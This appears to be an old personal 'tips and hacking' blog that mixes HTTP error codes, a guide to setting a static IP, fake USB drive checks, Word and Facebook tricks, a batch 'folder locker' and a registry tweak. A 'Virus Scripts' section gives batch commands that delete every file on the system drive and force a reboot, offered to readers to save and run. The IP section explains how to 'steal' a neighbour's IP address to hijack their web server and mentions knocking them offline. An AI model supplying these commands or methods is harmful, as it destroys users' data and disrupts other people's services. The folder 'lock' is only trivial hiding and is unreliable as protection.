Monday 28 January 2013

INTERNET ERROR CODES !!

Error 400 - Bad request.
Error 401 - unauthorized
request.
Error 403 - forbidden.
Error 404 - Not found.
Error 500 -Internal error.
Error 501 - Not Implemented
Error 502 - Bad Gateway
Error 503 -Service unavailable.
Error 504 - Gateway Time-Out
Error 505 - HTTP Version not
supported/DNS Lookup Fail/
unknwn host
Error 500-599 - Server Errors.
48 minutes

Saturday 26 January 2013

change your IP

Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, dhcp server, and dns servers.

1. Getting your IP range - Getting information about your IP range is not difficult, I recommend using Neo Trace on your own IP. But for my test just look at your IP address, say it's 24.193.110.13 you can definitely use the IP's found between 24.193.110.1 < [new IP] < 24.193.110.255, don't use x.x.x.1 or x.x.x.255. To find your IP simply open a dos/command prompt window and type ipconfig at the prompt, look for "IP Address. . . . . . . . . . . . : x.x.x.x".

2. Subnet Mask, Default Gateway, DHCP Server - These are very easy to find, just open a dos/command prompt window and type 'ipconfig /all' without the ' '. You should see something like this:
Windows IP Configuration:

Host Name . . . . . . . . . . . . . . : My Computer Name Here
Primary Dns Suffix . . . . . . . . . :
Node Type . . . . . . . . . . . . . . .: Unknown
IP Routing Enabled. . . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . . . . . . .: xxxx.xx.x
Description . . . . . . . . . . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI)
Physical Address. . . . . . . . . . . . . . . . . : XX-XX-XX-XX-XX-XX
Dhcp Enabled. . . . . . . . . . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . . . . . . : Yes
IP Address. . . . . . . . . . . . . . . . . . . . . : 24.xxx.xxx.xx
Subnet Mask . . . . . . . . . . . . . . . . . . . .: 255.255.240.0
Default Gateway . . . . . . . . . . . . . . . . . : 24.xxx.xxx.x
DHCP Server . . . . . . . . . . . . . . . . . . . .: 24.xx.xxx.xx
DNS Servers . . . . . . . . . . . . . . . . . . . . : 24.xx.xxx.xxx
24.xx.xxx.xx
24.xx.xxx.xxx
Lease Obtained. . . . . . . . . . . . . . . . . . .:Monday, January 20, 2003 4:44:08 PM
Lease Expires . . . . . . . . . . . . . . . . . . . .:Tuesday, January 21, 2003 3:43:16 AM

This is all the information you will need for now, I suggest you either keep your dos/command prompt window open or copy & paste the information somewhere, to copy right click the window and select text and click once.

III. Changing your IP Address

To change your IP address first pick any IP you like out of your IP range and remember it or write it down. It is usualy a good idea to make sure the IP is dead (except for what we are going to do later on) so just ping it via "ping x.x.x.x" and if it times out then you can use it. Now go to My Computer, then Control Panel. In Control Panel select Network Connections and pick your active connection, probably Local Area Connection or your ISP name. Open that connection by double clicking on the icon in Network Connections, then select Properties under the General Tab. In the new window that pops up select Internet Protocol (TCP/IP) and click properties, it's under the general tab. In this new window select the General tab and choose "Use the following IP address" and for the IP address enter the IP you would like to use (the one you picked from your subnet earlier) and for the Subnet Mask enter the subnet mask you got when your ran ipconfig /all, same goes for the Default Gateway. Now select "Use the following DNS server addresses" and enter the information you got earlier. Now just click OK. Test that it worked, try to refresh a website and if it works you know everything is okay and you are connected. To make sure the change worked type ipconfig again and the IP address should have changed to your new one.

IV. DDoS & DoS Protection

If your firewall shows that you are being DDoSed, this is usually when you are constantly getting attempted UDP connections several times a second from either the same IP address or multiple IP addresses (DDoS), you can protect your self by changing your IP address via the method I described above.

V. Web servers & Other Services

If you know someone on your IP range is running a web server and he or she has pissed you off or you just like messing around you can "steal" their IP address so any DNS going to that IP will show your site instead because you would be running a web server yourself.

To "steal" an IP is to basically use the changing IP address method above and picking an IP that someone that is running a web server has in use. Often you will be able to keep that IP at least for some time, other times you wont be able to use it so just keep trying until it works. You your self will need to have a web server on the same port with your message. You can do this with other services too. You can also DoS or DDoS the IP address you are trying to steal to kick him off the net, but I don't recommend as its pretty illegal, an your ISP will get p$issed 

Virus Scripts

1.This Virus Deletes All The Content Of A Drive…
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code with .bat extension & Run.

2.The Most Simple Virus To Crush The Window
@Echo off
Del C:\ *.* y
Save The Above Code with .bat extension & Run.

3.The below Code Will Just Restart Ur PC
@echo off shutdown -r -f -t 00
Save The Above Code with .bat extension & Run.
Note: Won’t work on Vista or Win7 as you need to bypass UAC.

Check storage capacity of fake USB flash drive
This can be done in case you find that the USB drive you purchased does not have prescribed capacity, written on the pack.
Here are the steps to find whether the real capasity is 8GB or not. (Works pretty well for other storage capacities too).
Normally The product shows itself as 8GB under Windows XP.
To find the stick’s capacity, read & write speeds:
1. Download the free version of the tool
Bart’s Stuff Test 5
Version 5.1.4
(Search in Google)
2. Before plugging in your flash drive, Disable the Autorun feature of Windows XP.
3. Plug the stick into an USB port (Warning: Make sure you have your AntiVirus updated).
4. Don’t open anything on the stick. Do not doubleclick on the stick.
5. Format the stick to get rid of any potential viruses or malicious tools.
6. Run Bart’s Stuff and select the stick under “Folder”
7. Start the test. It will write a sequential file that will fill the stick up to > 90% of it’s capacity and then it does read back the written data.
8. Check the Bart’s stuff status written total when you get an error message like this: “An Error occurred. WriteFile returned an Error. There is not enough space on the disk”.
If the stick ran out of space at 4 GB exactly, Bart’s Stuff filled the stick up to 52 % of it’s fake capacity. But: Since the FAT32 maximum supported file size is 4GB, this method would not work on flash drives with more than 4GB of capacity. Larger size sticks should be filled up with large files that are compared against their originals to see if some errors occur.
Hence it shows that the USB stick is fake.
Here is an another indication that proves the stick is fake:
Windows XP sees it as 7.95 GB capacity with 8,539,680,768 bytes. This is too much reported space.
Normally, 8GB stick is reported by Windows XP has 7.73 GB capacity with 8,304,717,824 bytes. Since flash drives always give you less than the advertised storage space.
There is another very useful utility that can help to check for fake USB sticks, it’s called H2testw ( Can be be downloaded at the downloads section of heise.de ). The program Measures the write and read speed. On fake 8 GB stick, You only get about 1 to 3 MB/s write speed which is an indication that there is something really weird going on here. the Utility sees the USB stick as 8144 MB in size when empty which is totally impossible, another hint that it was manipulated.

Monday 7 January 2013

Hi friends, I hope you are enjoying my tips and tricks. Today I am going to tell you a trick to be used in microsoft word. It is just like a magic.

Here we go.....
1. Open Microsoft ord.
2.Type  "=Rand(200, 99)" without quotes and hit Enter.
3. See the magic.

You can even alter the parameter passed within braces and see different effects.

I hope you enjoyed this trick.
Enjoy hacking,
Keep on reading my blogs.

Sunday 23 December 2012

The magic number trick just like any other facebook trick, allows a user to generate some sort of a code to tag the title of an intended page or group. But now it seems like some facebook are now using the same trick as a spammy way of advertising their facebook pages and groups. Viewed from a real perspective, these magic numbers are nothing but a unique ID number of  facebook UsersPages or Groups.

How it Works?
1. Login to your facebook account
2. Then Go to any profile, group or page of your choice
3. If for example you open a page, look at the url in your browser's address bar and get the ID from there as shown in the image below.


4. Now copy the ID Number and replace ''ID'' with it in the following code;

@+[ID:0]

In this example, Since my ID number is ''244744025579987'' therefore my code altogether will be;

@+[244744025579987:0]

5. Now, ask your friends to copy and paste the above code into their comment box and remove the plus+ sign so that it looks like this @[244744025579987:0] then hit Enter or click the share button and see the magic!!!

NOTE : The above code has just been used as an example, you can  use the same basic knowladge to generate a code of your own depending on the page of your choice.

Enjoy :D

Friday 21 December 2012

1) Make New Folder And Name it what You want..

2) Now open that Folder and Right click in that

3) Now goto New > Text Document

4)Now Name it Lock.txt

Now copy and paste following Code in that notepad

Quote: cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N) (By www.patelsanjit.blogspot.com)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder (By www.patelsanjit.blogspot.com)
set/p "pass=>"
if NOT %pass%== password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End


5)After u copy the command go to line ( 23 ) u will find "password here" Change to any password u want.

6)After that, save it as locker.bat (the txt file will change to an application file)


7)Now go back to the folder & u will find a this locker.bat file.
8)Click on it & u will find a new folder called Private


9)Now copy what u want in it & after that go to locker.bat by clicking it, it will open and ask you if you want to lock your folder? Y/N ?


10)Type Y


11)If you want to UNLOCK your folder, go open locker.bat & type your password and the Private folder will be made visible again.

1. Start regedit ie; Start->Run->regedit


2. Navigate to HKEY_CLASSES_ROOT\lnkfile


             If you find difficult in reaching this file location, simply Press Ctrl+F to open find window. Enter "IsShortcut" and click find. now Press f3 till you get the file Inkfile located at Hkey_Classes_Root\Inkfile


3. Delete the IsShortcut registry value.


You may need to restart Windows XP.